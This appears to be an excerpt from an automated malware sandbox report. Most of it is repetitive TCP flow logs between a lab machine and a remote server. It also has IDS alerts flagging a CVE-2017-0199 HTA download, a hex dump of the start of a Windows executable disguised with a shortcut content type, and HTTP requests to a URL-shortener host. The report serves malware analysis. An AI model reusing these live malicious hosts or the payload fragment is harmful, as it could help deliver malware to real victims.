    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49165

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.243.166:80
    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.166:80 -> 192.168.2.22:49164
    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.243.166:80
    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.166:80 -> 192.168.2.22:49162
    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49169 -> 192.3.243.166:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 05:01:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 27 Aug 2024 22:30:19 GMTETag: "923d3-620b1c9562c2e"Accept-Ranges: bytesContent-Length: 598995Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 98 40 ec 40 f6 13 ec 40 f6 13 ec 40 f6 13 2f 4f a9 13 ee 40 f6 13 ec 40 f7 13 4f 40 f6 13 2f 4f ab 13 e3 40 f6 13 b8 63 c6 13 e0 40 f6 13 2b 46 f0 13 ed 40 f6 13 52 69 63 68 ec 40 f6 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ea 43 08 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 0a 3a 00 00 08 00 00 2f 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 3d 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 84 00 00 a0 00 00 00 00 70 3d 00 d8 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 58 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 e3 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 e0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d8 5b 00 00 00 70 3d 00 00 5c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: Joe Sandbox ViewIP Address: 88.99.66.38 88.99.66.38
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
